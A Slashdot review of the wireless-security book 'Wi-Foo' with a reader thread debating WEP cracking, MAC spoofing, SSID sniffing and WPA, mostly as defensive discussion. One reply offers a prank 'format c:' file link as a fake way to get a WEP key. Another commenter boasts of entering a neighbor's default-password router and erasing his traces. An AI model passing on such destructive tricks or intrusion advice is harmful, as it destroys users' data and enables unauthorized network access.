Wi-Foo: The Secrets of Wireless Hacking

prostoalex writes "Wireless LANs seem to be enjoying the tremendous amount of interest lately, if you judge by the number of book covers and articles written on the topic. It's no wonder that this year the sales of WLAN equipment will grow 20% and generate $2.1 billion - everyone seems to be installing a wireless network in their office, their apartment complex or their own backyard. With extending the network into the radio world one is always extending the opportunities for unwelcome visitors to become part of the network. This book is a hands-on guide on hacking wireless networks followed by the recipes and principles to protect WLANs." Read on for the rest of prostoalex's review of Wi-Foo . Wi-Foo: The Secrets of Wireless Hacking author Andrew Vladimirov, Konstantin V. Gavrilenko, Andrei A. Mikhailovsky pages 608 publisher Addison-Wesley rating 9 reviewer Alex Moskalyuk ISBN 0321202171 summary Complete guide to wireless attack and defense

Wi-Foo requires a certain level of expertise, and it's unlikely that the book will be sold left and right or that everyone will want a copy. First of all, to do anything substantial you need to have Linux or FreeBSD operating system installed and know your way around it. Second of all, some knowledge of Perl is required to go through the script source code and enjoy occasional tools that appear on the Internet. The third required bit of knowledge is some familiarity with how wireless networks work and how one can gain advantage of those radio waves that seem to contain pieces of data.

The authors claim that one has little knowledge of wireless security unless he's done some war-driving. So, skipping the first two chapters (which talk about security in general), chapters 3, 4 and 5 take the reader through the hassle of setting up the Linux laptop with all the hardware and software needed to do successful war-driving. The last time I reviewed a book on getting wireless to work with Linux, you guys kept asking what card would work the best with a Linux laptop. To quote p. 28 of Wi-Foo, "if you're serious about 802.11 penetration testing, you should get a decent Prism chipset card. If you plan to base your security audit effort around the BSD platform, you probably cannot do without it. Prism chipset CF and PCMCIA cards are known to be produced by Addtron, Asante, Asus, Belkin, Buffalo, Compaq, Demark, D-Link, Linksys, Netgate, Netgear, Proxim, Senao, SMC, Teletronics, US Robotics, Zcomax and ZoomAir."

What follows could essentially be condensed into a single Web site with links to various Linux tools for network discovery, traffic analysis, encryption cracking, 802.1x cracking, frame generation and traffic injection. Kudos to the authors for providing sometimes detailed instructions on setting up the utility and getting the successful results out of it -- it's obvious that they did not just peruse the Web in search of what's available and provided a list of URLs; they installed, tested and reviewed all the Linux network security utilities listed in the table of contents. As much as many of the products and tools listed complement one another, it was useful for me to see the professionals' take on advantages and disadvantages of free tools out there. Wherever possible, the authors try to stick with free software, which makes the book a pretty useful guide for most enthusiasts out there.

The authors are serious about getting the reader to war-drive at some point, and chapter 8 specifically talks about generating wireless denial-of-service attacks as a last resort for a cracker, who seems to be in the bad mood when other methods of wireless penetration do not work. The books talks about antenna amplifiers and some hardware you might buy to be more successful in wireless hacking. They also discuss the possibilities of war-biking, war-walking and riding a hot air balloon.

By the time you're finished with the chapter 9, if your title includes words like "security" or "administrator," you will probably find yourself quite perplexed. That's where Part 3 (Defense) kicks in, as the authors discuss counter-measures against wireless cracking and possible steps one can take to secure the wireless network. It's not a typical don't-use-WEP-don't-broadcast-your-ID-don't-rely-o n-MAC-filtering preaching one can find in security manuals created for the home user (I am not saying those are bad -- for a home user they do provide necessary guidance in securing a WLAN). This is mostly industrial-level security, which might include multiple levels of protection, such as 802.11i implementation, implementing encryption around the wireless networks, creating hardware Linux-based gateways, deploying VPNs and intrusion detection systems. Setting up honeypots is missing from this list, although one can debate whether this could be considered a worthwhile project outside of academic world.

The book uses clear language and is easy to read. At the same time it takes a while to go through it, as you keep trying out the presented solution on your Linux laptop. The chapters that talk about the philosophical decisions when securing wireless LANs are helpful as well -- the authors occasionally get away from hands-on approach and talk about general principles to consider. Code examples are easy to follow, and every tool that's presented in the title is accompanied by the URL (for some reason Addison-Wesley did not include a CD with Wi-Foo); a large number of them point to sourceforge.net. All the links are available on the book's Web site; see the attack and defense sections.

If you should decide to take up a career as a wireless security consultant, Appendix G includes a variety of checklists and templates that the authors recommend for the corporate environment. Chapter 8 -- Breaking Through is available for free in PDF format. Overall I liked this book a lot. It seemed to concentrate on what's necessary without going into fluff and chapters like "History of radio" or "Linux on laptops for beginners." It's informative and easy to read; if you're an enthusiast, try out the free chapter and see if you like the authors' style, but if you're network admin or security professional, this book is almost a must. It's a combo of Exploiting Software and Hacking Exposed with specialization on wireless LANs.

You can purchase Wi-Foo from bn.com. Slashdot welcomes readers' book reviews. To see your own review here, carefully read the book review guidelines, then visit the submission page.

unwelcome visitors

[dncsky1530]

you can always not broadcast your wlan name and set a password, it works against most people. And on the other end you can always use KisMac or KisMet

Re:unwelcome visitors

[garcia]

Run everything over encrypted tunnels. Yeah it may be a performance hit but I'd rather not run the risk of an easy snoop.

What we need is a book for router manus that teaches them how to not enable default SSIDs and admin passwords for wireless networks. My neighbor would probably thank them.

Re:unwelcome visitors

how? what do you use?

Re:unwelcome visitors

Or you could just not have anything on your computer you wouldn't mind anyone seeing. If you don't want to explain it to a judge, don't have it!

Re:unwelcome visitors

[drinkypoo]

Run everything over encrypted tunnels. Yeah it may be a performance hit but I'd rather not run the risk of an easy snoop.

This is exactly what I do, I set up PPTP VPN with 128 bit encryption and forced encrypted passwords. I used PPTP so I could support Win98 clients, but I'm getting ready to get ipsec going too. I don't bother with WEP but I do use MAC whitelisting - sure you can spoof 'em but it will keep the casual lusers away.

Also it doesn't have to be a performance hit but if it isn't it's going to be a wallet hit. You can get crypto accelerator cards and use them in assorted operating systems including Linux. Linux uses pluggable crypto stuff from the kernel so if you have a crypto card in theory it ought to be used automatically, provided you're using an appropriate cipher, but I really don't know for sure what I'm talking about because I don't have a spare fifty bucks to blow on a crypto card. Besides, a $50 processor upgrade (at least when specifying a new system) will probably do almost as much good and will help with other things.

I would think that other free Unixes would do the same sort of thing, but I know even less about them :)

Re:unwelcome visitors

WTF? I don't mind explaining my credit card number to a judge. Yet I don't want to broadcast it in plaintext over the airwaves.

Re:unwelcome visitors

quiet you! i like my free internet exactly the way it is!

That makes a good quote

[Lord+Grey]

Neo: "I know Wi-Foo."
Morpheus: "Show me."

Re:That makes a good quote

Boy: Do not try and hack the AP. That's impossible. Instead only try to realize the truth.

Neo: What truth?

Boy: There is no password.

Neo: There is no password?

Boy: Then you'll see that it is not the password thats exploitable, it is yourself.

Re:That makes a good quote

Actually, no, it doesn't.

Re:That makes a good quote

[shigelojoe]

Neo: What are you trying to tell me? That I can dodge packet collisions?

Morpheus: No, Neo. I'm trying to tell you that when you're ready, you won't have to.

...

I think I just lost the Matrix quoting competition. :C

Re:That makes a good quote

[Crzysdrs]

Morpheus: "The Wi-Fi is everywhere. It is all around us. Even now in this very room. You can see it when you look out your window. Or when you turn on your television. You can feel it when you go to work. When you go to Church. When you pay your taxes."

Re:That makes a good quote

Your Wi-Foo is not as strong as my Wi-Foo

Greeeat

[TaintedPastry]

Now the two who replied first can figure out how to bust into my home network, just what I need.

Of the few exploit/hacking books I've read they seem more like "This is how much I (the author) know, that you don't" instead of informative, factual exchange of security-minded information.

I may jump on this one, if not just to see if they laid the hubris on heavy this time...and, well, also because of the simple fact that the future is going to be completely wireless.

Re:Greeeat

[wakejagr]

"I may jump on this one"
Same here. It isn't too often that a Linux/*BSD book comes along that I will actually buy. Usually, anything F/OSS related can be found online, or in one of the bigass "sysadmin bible" type books I bought when I first got into Linux. However, wireless is one area that isn't too well covered in my bigass books, and it might be nice to have all this info in one place. I could probably find a lot of this online, but it's always good to have a starting point that doesn't require that my network is working. Makes even more sense if your network is wireless ;)

Re:Greeeat

[gl4ss]

the future is going to have a lot of free radio frequencies?

Re:Bad Name

[ryane67]

huh????

home based wireless lan's

[Stypen]

WEP.. simple, easy, mostly effective.

Re:home based wireless lan's

*snort*

More accurately...

*AirSnort*

Re:home based wireless lan's

[storl]

WEP by itself sometimes is not enough, especially if you transfer a lot of data through your wireless network in a heavily congested wireless area. Someone can sit outside and analyze the collisions and deduce your key (I believe that's how it works). If you combine high-level WEP with MAC protection and do not broadcast your ID, the vast majority of people will not be able to get onto your network. Luckily, these three things are relatively easy to do if you RTFM. Changing your key every now and then is a good idea too. Of course, there is always the slashdot crowd to prove me wrong...

Re:home based wireless lan's

This is all enough :). Since the normal user only does some internet surfing and maybe editing a document and no real mass traffic via WLAN, this should be ok.

Re:home based wireless lan's

[Smallpond]

WEP is so insecure it is being replaced by WPA + RADIUS. WPA can change 256-bit keys every 50 minutes to eliminate cracks by programs like Airsnort. RADIUS gives you central admin instead of having to change a key on every device manually. Cisco LEAP uses a separate one-time key for each session, which seems pretty secure.

Re:home based wireless lan's

[bugnuts]

The issue with WEP is that there are predictable packets where you can slowly derive information, and eventually obtain complete key recovery, and increasing the keylength only increases the difficulty LINEARLY, not exponentially.

Normally when you add a single bit, it doubles the time for brute force attacks. Instead of being TWICE as difficult when going from 40 to 41 bits, it's only 1/40'th more difficult.

You need to collect about 2GB of data to recover a 104 bit key, on the average.

Now... that all said, it's arguable that if you even use a 40 bit key that you are proclaiming your network PRIVATE, where unauthorized use is actually a criminal offense. In other words, any use of it requires actually attacking the network, not just turning on your computer, which typically meets or surpasses any implied consent requirements. You will discourage anyone that wants to "ethically" borrow wireless by setting a WEP key.

It's kind of like locking your screen door. It's easy to get past, but pretty obvious it's breaking and entering.

If you're interested in providing an open network but with a "I won't break your network or the law" agreement, check out NoCat.

Re:home based wireless lan's

[bugnuts]

Not true... internet surfing gives lots of data to analyze. And since the key will likely be the same forever, it should be easy to collect enough to analyze.

Re:home based wireless lan's

[Darth_brooks]

From Airsnort.shmoo.com: AirSnort requires approximately 5-10 million encrypted packets to be gathered.

Wanna tell me how you're gonna grab 5 million packets (not counting SSID broadcasts) from a single network whist wardriving? You need quite a few users going for a long time to generate that much traffic.

Yes WPA is bettter, and it's nice to see it becoming a standard. But despite the FUD, WEP is not some disgustingly horribly insecure protocol that's gonna get hacked in 15 seconds by any script kiddie with a wifi card. It takes a *long-ass time* to gather the amount of data needed to crack WEP. There's far easier ways into a network. But then again, it's so much fun to play baby seal and arp away about WEP totally sucking ass.

Try a capture on a home network and see how long it takes. My own net is four machines, including two always-on boxes. It still takes days to generate enough traffic to make an attempt at cracking WEP.

For home (house) use, 128-bit WEP will work just fine. For office environments or apartment buildings, you should still crank things up a notch with MAC whitelisting etc.

Re:home based wireless lan's

[bbdd]

i agree with the parent, and i found these comments to be very interesting. if you are up to date on firmware patches, wep might be enough for you.

if you are trying to protect missile launch codes, i might look elsewhere, but for day-to-day crap...

Re:home based wireless lan's

[g_kos]

You are not entirely correct, it is possible to inject the traffic into the wep protected network. besides, it is even possbile to portscan the machines on the wep protected networks. e.g. http://sourceforge.net/projects/wepwedgie/

Re:home based wireless lan's

[g_kos]

Joshua has released a tool to "recover" leap passwords a year ago...

http://asleap.sourceforge.net/

Re:home based wireless lan's

[AK+Marc]

WEP by itself sometimes is not enough,

Sure it is. Unless you have specific enemies, or you are next door to someone that has nothing better to do than try to illegally break into your network (not too bright to commit a federal felony just to save a little on the cable modem bill), then WEP is more than enough. Sure, it isn't unbreakable. But it will get anyone mobile looking to get free access or check out someone's computers to move down the block to the unencrypted one.

Your security doesn't have to be foolproof. It just has to be good enough so that the people looking to break in move to the next target.

with MAC protection

Uh, speaking of poor security, it takes all of one captured packed to defeat this. Find the MAC of a card that is on the network (in the headers, easy to get), and manually set your card to that MAC. You'll run into fewer problems if you don't try to get on at the same time they are on, though. Again, that will only keep out the stupid and uncommitted, and can be cracked with inspection of a single packet. For something so utterly useless compared to even the flawed WEP, I'm surprised it even made your list. I don't know of a single person capable of cracking WEP that wouldn't get through your MAC filter in less than 30 seconds (and that's people capable of breaking WEP, not just people who say they've seen some tool available somewhere that may capture packets or something).

Oh, and even if you don't broadcast your SSID, it is included in the packets. There are tools that will scan more than just the beacon packets and will be able to pull the SSID out. Again, someone that knows what they are doing will be much more inconvenienced by WEP than all the other things you mentioned combined. Sure, it improves security. It's like locking the door handle when you have already locked the deadbolt. If someone can defeat a deadbolt, they can easily defeat the handle lock as well.

Of course, there is always the slashdot crowd to prove me wrong...

Not prove you wrong. You are right. It is harder to break into a network that also has MAC filtering enabled and SSID broadcasts disabled. But, even as easy as it is to set up, even easier to break those than it was to set them up (assuming that someone capable of cracking WEP is moderately familiar with the concepts). So, though correct, I'd put it in the FUD category.

Re:home based wireless lan's

Except that not everybody using lame-ass airsnort. Hang around netstumbler.org and weep... WEP is really shit.

Re:home based wireless lan's

My lecturer tells me there are two different levels of security: Real security and kid sister security. When you say "the vast majority of people will not be able to get onto your network" you are referring to the latter. That is, your kid sister can't crack the code but that's about it.

If you want more security than that - don't rely on WEP.

Re:home based wireless lan's

[Matje]

Just for my understanding: wouldn't bypassing a MAC filter or eavesdropping on the SSID be illegal as well? If bypassing WEP is illegal, this stuff is too right?

Re:home based wireless lan's

AirSnort relies on the now three year old "standard" FMS attack, and is sub-optimal. On the other hand, the very lastest release of aircrack with the korek patch introduces a whole new set of attacks, making it possible to crack a 104-bit WEP key with as few a half a million encrypted packets (the probability of success is about 90%). With the help of WEP encrypted arp-requests re-injection, you can gather enough packets in less than an hour.

For more information, see this thread about aircrack

Re:home based wireless lan's

Exactly... and knowing what sites they are browsing (who doesn't load www.google.com from time to time?) you have plenty of predictable data to help you break the crypto.

Re:home based wireless lan's

[AK+Marc]

Eavesdropping on the SSID would not be illegal. It is being broadcast. You have to take no special steps to read or understand it. Just because they turn off the packets with no other real purpose than to broadcast the SSID does not mean that the SSID is not continuing to be broadcast.

As for whether bypassing MAC security is illegal, that is for the courts to decide (and they will probably do so poorly, as they do with most technical issues). The SSID is an invitation to join a network. Pulling a MAC is not pulling an invitation, so it is different, but it is still taking unencrypted broadcasts being publicly transmitted and entering the information in your computer. By spirit, it should be illegal, but I don't think it has ever been officially decided.

Not just wireless

[caluml]

As well as being experts in the Wireless field, they also run a very good InfoSec company. www.arhont.com. Highly recommended if you want the view that the black hats would have of your networks.

Hmmmm...Packets

[radiumhahn]

My wireless router's breath smells like packets.

Re:Hmmmm...Packets

[radiumhahn]

Ralph Wiggum, Network Admin.

One word...

[mi]

IPSEC

Windows, BSD, Linux -- whatever...

Re:One word...

[Artega+VH]

Why add that extra layer for most home users? I find its an absolute pain at university and couldn't imagine using it at home...

A combination of WAP/WEP MAC address allow lists and not broadcasting the network name will keep pretty much everyone out. Why would soemone bother breaking in when there are several open wireless networks on every street. (at least in my suburb)

Re:One word...

[Fuzzums]

For what I know, IPSEC doesn't stop me from (ab)using your wi-fi internetconnection.

Re:One word...

Not if you allow non-IPSEC connections, still.
But why would you do that?

Re:One word...

because yours might the most interesting/challenging given those facts?

Re:One word...

Well, more of an acronym, really.

Re:One word...

[mi]

For what I know, IPSEC doesn't stop me from (ab)using your wi-fi internetconnection.

You don't know enough -- it does. My NAT-ing gateway will not talk to you, nor will anything else on my network. You will not be able to read, what my network talks about, nor will you be able to use the Internet through my uplink.

Slow internet...

[livhan28]

And my neighbor will never know...why his internet got so much slower the day i came home from college...

Re:Slow internet...

No kidding, when I bought the card+router bundle at local BestBuy, I was thinking of returning the router when I did a search of available wireless networks and discovered three of them named linksys .

Re:Bad Name

[outsider007]

Kung Fu is a martial art skill.
Kung Foo is programming skill.
Therefore Wifi Foo is skill at hacking/securing wifi networks.
You overthought this one.

Re:Cracking a pswd

Check astalavista or download.com, there's a bunch of password utilites for Windows allowing you to decode those asterisks.

Re:Cracking a pswd

Iopus Password Recovery should do the trick.

Re:Cracking a pswd

f you have physical access to a Win XP machine that is on the wireless network how can you obtain the WEP pswd

Type 'network'. If that doesn't work, open a browser window and type file:///c:/windows/system32/format%20c:/

Man, you guys Rock! W00t!!! I'm gonna try this right n

WPA-PSK?

[Proc6]

With a really decently long key? I've not heard of any compromises of WPA-PSK yet. WEP yes, WPA no.

Re:WPA-PSK?

You'll need at least 20-character key for WPAv1-PSK. Who would remember that without writing it down and sticking in on a monitor ? :)

Gnoppix sucks at display.

That is all.

Missing anything?

[NEOtaku17]

Steps to securing my WLAN:

1.Change default router login password
2.Enabled firewall
3.Mac address filtering
4.AES encryption with non-dictionary 15 charcter passphrase
5.Disabled SSID broadcast
6.Updated to latest firmware
7.Disabled remote router login
8.Enabled 802.11g only
9.Updated to latest wirelss network card drivers

Am I missing anything really obvious?

Re:Missing anything?

[redwoodtree]

Yes, a few things:

* Change the Key monthly or otherwise periodically.
* Even with all this, run encrypted protocols as much as possible SSH, SSL, etc. No clear text protocols
* Run a monitor on your access point to monitor against your MAC Address filtering list, send a trap when an unkown Mac address connects. By definition if you have a Mac address allow list you should be able to do this easily.

Re:Missing anything?

[bugnuts]

Am I missing anything really obvious?

???
Profit!

Re:Missing anything?

[j1m+5n0w]

Am I missing anything really obvious?

10. A tin-foil hat?

-jim

Re:Missing anything?

[g_kos]

1. Change default router login password - wise thing to do, but will not help if your windoze box is accessible through the wireless.
2. Enabled firewall - you forgot to mention that it has to be properly configured :)
3. Mac address filtering - takes seconds to bypass, by sniffing the air.
4.AES encryption with non-dictionary 15 charcter passphrase - are we talking about 802.11i ???
6 Disabled SSID broadcast - NOT TRUE. the SSID is sniffable in the air
5. Updated to latest firmware & 9. Updated to latest wirelss network card drivers - what difference does it make if the flaw is in the standard itself.
7.Disabled remote router login - well, not always works on every router, might still be configurable through SNMP, what stops from owning your windoze through wireless and finally strict source routing might help.

apart from the above, it is a good attempt ;)

Re:Missing anything?

[ambit]

Disable the router from serving DHCP.
Assign yourself static addresses.

Re:Missing anything?

[mikewas]

256 bit WEP? Only a couple of manufacturers support it.

Re:Missing anything?

I did not use a passphrase to generate my WEP key. Instead I generated as a hexadecimal string using a d20 (20 sided die found at hobbiest stores, used in the D&D faimly of role playing games). Each hexadecimal digit may be generated as follows:

20 = 0
1=9 = face value
10=A
11=B
12=C
13=D
14=E
15=F
16-19=r e-roll.

The advantage of this method is it produces a key that is immune to a dictionary attack as it is highly unlikely that any pass phrase corresponds to it. Every bit has an equal chance of being set or unset.

Note -- do NOT roll a standard 6 sided die 3 times and add the result subtracting three. Although this does produce digits from 0-15, there is not an equal distribution. A 7 is far more likely than the combined odds of a 0 or F.

Re:Missing anything?

[MsGeek]

Also keep your WAP on a separate "real world" IP from the rest of your system. Thanks to DSL Extreme, I now have the ability to completely separate the wireless traffic from the wired traffic. If someone gets around these obstacles:

* SSID broadcast OFF
* DHCP OFF and static address in a non-obvious non-routable range (not 192.168.0.x, 192.168.1.x, 192.168.2.x or 192.168.254.x. Most routers default to these ranges and so does Windows Internet Connection Sharing)
* MAC address whitelisting
* WEP key

all they'll get is the ability to piggyback on my connection. That's it. They will be on a different subnet to anything I care about. Knock yourself out, l33t b0i.

(Note: this can be accomplished with some fancy routing and non-routing on a firewall box with two nics and a WAP. But this way is easier. And yes, I know that nothing is uncrackable.)

Re:Missing anything?

[syukton]

There are ways of changing a device's MAC address, aren't there?

If the MAC address is the kind of information that you can glean from captured packets, then you might want to consider also cycling the MAC addresses of your devices on a regular basis as well. I mean, for the utmost in security. It depends, I suppose, on how much somebody wants to get inside your network and whether or not you know about it...

wireless boosting?

[dextr0us]

Hey, i'm just getting into wifi, and i want to know a couple websites for boosting my wireless range, my college is about a mile away, and i'd like to get the signal there.

Re:wireless boosting?

http://www.ezlan.net/Distance.html

Re:wireless boosting?

[bugnuts]

Get one of these.

Re:wireless boosting?

[mrconnors]

Depends on the brand of your router, but I have seen some really good performance out of the firmware at http://sveasoft.com/

Re:NJ comes out of the closet; leaves office.

gay!=pedo

Disable SSID not all it's cracked up to be.

There are performance problems and it still can be sniffed:

http://www.tisc2002.com/newsletters/416.html

Read mine for free

[rworne]

I did something similar for my Master's Thesis.

Mainly I looked at various tools and how effective they were. I also looked at setups in the surrounding neighborhood and pwn3d (with permission) the campus VPN via the wireless network.

Re:Bad Name

[AK+Marc]

You must have missed out on all the americanisms. "Foo" has been coopted (with the mispelling) to mean skill, and must be combined with another noun. "Boy, she has some dance foo going." "He has some serious computer foo, he broke into that network like it was nothing." And of course, all the people that post stupid repsonses but get moderated up anyway have Slashdot foo.

wep is secure?

[8400_RPM]

I've been trying to hack wep for days in my test lab. With newer network cards, it seems wep is more secure than people give it credit for. After over 100million encrypted packets, I had 0 interesting packets....

Re:wep is secure?

[rworne]

Firmware after early 2001 implements "weak key avoidance" or WEP+. I've collected from 16M to 20M packets and have not been able to crack a key although I've had plenty of interesting packets.

Wanna try something fun? Use a 40-bit WEP key and try Newsham's attack, that's scary.

Re:wep is secure?

"After over 100million encrypted packets, I had 0 interesting packets.... "

Hey, it's your own fault if your lab net is boring. Perhaps you should get on there and surf some porn? Or do some online banking? That would generate some more interesting packets, I bet.

Re:wep is secure?

Not exactly all firmware, WEP+ is a Proxim's proprietary weak IV avoidance algorithm. It is dumped since the TKIP adoption.

Re:wep is secure?

[rworne]

Yes, but Prism firmware also has weak key avoidance as well. Proxim/Lucent just give it a cool-sounding name.

About disabling SSID broadcasting.

Though it's nice cause it is incompatible with Windows XP WZC, a simple disassociation frame (a la airjack) will force any client to broadcast it, making the protection quite useless.

Re:About disabling SSID broadcasting.

Just one of the many reason not to use Windoze Zero Config. WZC was already the most poorly implemented GUI in XP, but brace yourself for the hideous SP2 version. Yep, the new graphics are in, but WPA2 compatibility was left out. Trustworthy computing... when we finally get around to it.

What about 802.1x?

I just finished setting up a Proxim AP in my corporate office. Used 802.1x; signed certificates, radius authentication and dynamic rekeying. I'd be very curious about the author's methods for cracking 802.1x. Can't imagine how its possible. Has anyone read the book?

Re:Bad Name

[Agent+Green]

And then there's B.A. Baracus of the A-Team...'cos he always pitied the foo'.

Factory settings, gotta love 'em

[glass_window]

As I sit here at my aunt's house, I am currently logged in via the friendly neighborhood linksys 802.11b router (BEFW11S4) complete with it's default settings. I've been enjoying internet access all week and I thought I'd check to see if they at least changed the factory default settings and low and behold I logged right in. It's good to know I can remove my mac address before I leave (just in case).

Wireless Protected Access

[el+americano]

You should expect, with a name like Wi-Foo, that the author will try to mystify a rather simple topic. There's nothing here that isn't covered better on the Internet. The state of wireless hacking is sniffing obscured but open networks, compromising WEP, and compromising LEAP.

Wireless Protected Access (WPA) with TKIP or AES is all you need to stop the author and any of his readers. Someone mentioned WPA-PSK - end of drama. [No weak passphrase, of course] If you have a RADIUS server running anyway, or need to serve a large pool of users, try WPA EAP-TLS. The real security issues faced by corporate wireless network administrators, such as rogue access points and other AP management issues, are better dealt with by books for security administrators, not wanna-be hackers.

The free chapter is filled vague, yet dismissive descriptions of non-existent PSK and TKIP attacks. In fact, the reader would have to surpass the author to learn how to really implement a man-in-the-middle attack, based on those "buy this hardware and use this software" descriptions. Use it how?! The obligatory reprint of the published WEP exploitation theory did not include any additional practical code. The rest, it seems, is left as an exercise for the reader, as it is everywhere else. How did this get such a fawning review?

Re:Wireless Protected Access

It seems to me that you have not read through the book, just glanced through the free chapter and the table of contents, if you derive to such conclusions.

I am a big fan of wireless and security myself and I have to agree that some thing that you say are indeed true, but the rest of your post is utter bullshit. From your nick, I should expect that you eat hallucinogenic cactuses ala Carlos Castaneda and completely miss the real world picture of the wireless security out there.

Pretty much every topic you can think of is covered on the Internet, so what?! If you want to buy something that no information is on the web, go and buy a next edition of Harry Porter book dude.

What I truly like about Wi-Foo, is that the information is collected in one place, analyzed, and presented to the readers in such a way that wi-foo makes a good buy for readers with varying levels of skills and determinations.
What is out there that you can compare wi-foo against? Maximum Wireless Security or maybe Wardriving guide?

To reinforce my point, that mescaline is a rather strong hallucinogenic mind-altering drug, on your example obviously, I have to bring statistics and common sense on my side.
How many APs have been sold in the world, that do not support WPA? How many people who have such APs would buy a new one, just to have these three wonderful letters on the box? They would not care for, as 99.9% would not even know what a hell it stands for.
Suggesting a RADIUS server is OK for corporate users willing to spend a $$$ on protecting the wireless infrastructure, but for for a home use of one AP and one client is one of the dummiest idea I have ever heard (is it LSD now? ;)

Coming to the free chapter, and potential attacks, initially you wrote that you didn't like the information being available on the net to be included in the book, now you say that you do not like the presence of hypothetical attacks? I believe the authors were writing the book, not a tool. full stop
If you are so clever as you want everybody to think you are, why don't you write such a tool yourself. What are you famous for apart for criticizing what you have not even seen or read.

IMHO, Wi-Foo is definitely the best book available on wireless security, and I am glad that I have bought it.

To answer your last comment "How did this get such a fawning review?" i can suggest that not everybody as "smart-arse" as yourself. I really find the viewpoint of "everybody are dumb, and I am the clever one" to be rather limited and idiotic.

Finally, dude, stop eating these cactuses.

Re:Wireless Protected Access

WEP looked pretty secure when it was just released. CCMP looks pretty secure now. Only time will tell whether it is true or not. Anyway,
there was a fat report claiming that only 22 % of WPAv1-enable devices from different vendors can interoperate. I don't even dare to think what would be that value with WPAv2. So, old good WEP is with us to stay, want it or not.

By the way, TKIP-PSK key-from-passphrase generation algorithm is, indeed, flawed - the book is right on that. And you forgot to mention EAP-MD5, which is flawed but I've seen it in use many times (fallback solution due to some compatibility problems?). Also, if you need to serve a large pool of users, EAP-TLS is a bad choice, unless you really want to distribute all these client side certificates for fun. EAP-PEAP is a much better choice if you don't want to pay Funk Software for the Odissey suite to use EAP-TTLS or stick to purely Cisco WLAN with EAP-FAST.

As to the wi-foo book, I think it deals with the wireless defense issues much better than any sysadmin-oriented book I came across before. And I don't think they wanted to provide canned attacks a la "Hacking Exposed" but are more trying to inspire people to develop their own tools a la Shiffman's "Writing Open Source Security Tools" and provide some directions for such development. Nothing wrong with that. Btw, liked their WEPWedgie description/modifications. Wonder when the second version of this great tool comes out. Read the whole thing!

Re:Wireless Protected Access

[el+americano]

It seems to me that you have not read through the book, just glanced through the free chapter and the table of contents, if you derive to such conclusions.

Imagine, basing my comments on the actual contents of the book. You have nothing to complain about here, I think. From what I've seen, I'm not going to waste my $35 for the whole book.

Pretty much every topic you can think of is covered on the Internet, so what?!

Usually a book presents more and better organization than what is found on amatuer websites. We disagree on whether this book is worth charging for.

How many APs have been sold in the world, that do not support WPA? How many people who have such APs would buy a new one...

We are presuming people who care about security, right? $60 for a WPA enabled G access point is cheap. If we're talking about really old stuff, they'll want to upgrade from 802.11b anyway.

Suggesting a RADIUS server is OK for corporate users willing to spend a $$$ on protecting the wireless infrastructure, but for for a home use of one AP and one client...

I didn't say 1 AP and 1 client. For someone with a home network who is already running RADIUS, TLS is not a big overhead. Surely, someone with Wi-Foo like yourself would have no problem setting up Free RADIUS and Open CA.

I hope I've been able to answer some of your questions, but if your position continues to be that I'm on drugs and you're not, then you should just ask yourself, what is the best wireless security that you been able to defeat with your Wi-Foo? Oh, is that all? What does THAT tell you, Grasshopper?

Re:Wireless Protected Access

[el+americano]

WEP looked pretty secure when it was just released.

Excuse me, WEP was a known vulnerability even before it was released. WPA and RSN are looking forward to provided a sufficient number of years of protection before future processing power is able to defeat it.

Anyway, there was a fat report claiming that only 22 % of WPAv1-enable devices from different vendors can interoperate.

I hadn't heard, but this was probably before Wi-Fi certification became so commonplace. Anything with a Wi-Fi logo supports WPA and is proven to interoperate with the major chipset manufacturers.

By the way, TKIP-PSK key-from-passphrase generation algorithm is, indeed, flawed...

PSK with weak passwords is theoretically attackable. I don't think there's a script for the kiddies yet, but if you choose a passphrase like "i read about this on slashdot, Wi-Fooers!", then you are not at risk from that attack.

Yes, I would choose to distribute the user certs for TLS. There are many managment tools for this. The problem with PEAP is that the CA cert is widely distributed, if not actually public, which could allow someone to attack weak passwords.

I glad you got something out of the book. I do think they present it as a practical guide, but then are too vague in spots, and even resort to hand waving at the higher end. Take their advice on acquiring a WLAN card with the Prism chipset. Many of the manufacturers they mention don't sell Prism based cards anymore. Just another example of how you have to figure it out yourself anyway (as with most of the software). So, who needs the book?

Re:Wireless Protected Access

Imagine, basing my comments on the actual contents of the book. You have nothing to complain about here, I think. From what I've seen, I'm not going to waste my $35 for the whole book.

> You can not base the comments on the actual contents if you didn't "waste your $35 for the whole book" - plain and simple. Don't forget that what is given online for free is determined by the publisher (to my knowledge anyway) and is likely to be something they would consider to be sales-boosting, not obviously the most deep & informative.

Usually a book presents more and better organization than what is found on amatuer websites. We disagree on whether this book is worth charging for.

> How much is a CWSP Guide as compared to Wi-Foo and which book gives more technical info and is more practical ?

We are presuming people who care about security, right? $60 for a WPA enabled G access point is cheap. If we're talking about really old stuff, they'll want to upgrade from 802.11b anyway

> The upgrade is far from being obvious. For many, even half-duplex 2 Mbps is enough. Don't forget that there are still corps and orgs that use 802.11 FHSS, low ISM band Breezenet and so on. Besides, many organizations such as the health services or large retail chains paid millions for deploying many hundreds if not thousands of 802.11b AP's and simply can't afford throwing them away and spending more millions just to support CCMP. And not all of these AP's are easily upgradeable to WPAv1, besides for huge networks like that such upgrade is neither fast nor cheap (yes, they need better sysadmins and more of them, but where would they get them and would they want to pay for it ?)

I didn't say 1 AP and 1 client. For someone with a home network who is already running RADIUS, TLS is not a big overhead. Surely, someone with Wi-Foo like yourself would have no problem setting up Free RADIUS and Open CA.

> Actually the book does describe exactly that in a great detail, also dwelling a lot on LDAP, NoCat, setting up Open Source wIDS sensors and so on. Any other literature sources that do the same, please ?

I hope I've been able to answer some of your questions, but if your position continues to be that I'm on drugs and you're not,

>Actually, I do not think you are on drugs. I was simply picking on your nick without knowing you the same way you picked on the book's (humoros) name without reading it all. This gives you the taste of your own medicine: similia similibus curantur.

then you should just ask yourself, what is the best wireless security that you been able to defeat with your Wi-Foo?

> A WPAv1-protected WLAN via a man-in-the-middle attack as implemented by Max Moser's Hotspotter.
Won't mention WLANs protected by IPSec running IKE in aggressive mode, Wavesec and older versions of PPTP (See the PPTP security analysis by Zen Parse of Teso Team).

Oh, is that all?

> Yes, and in the case of the WPAv1 WLAN it is, of course
1. a Windows, not the security protocol's flaw
2. it is now patched
but
1. Network was still broken into
2. Timely patching habbits of MS admins are cherished around the world.

What does THAT tell you, Grasshopper?

> that even if the protocol is reasonably fine, there would still be foobared implementations making it pretty useless.

Re:Wireless Protected Access

Excuse me, WEP was a known vulnerability even before it was released.

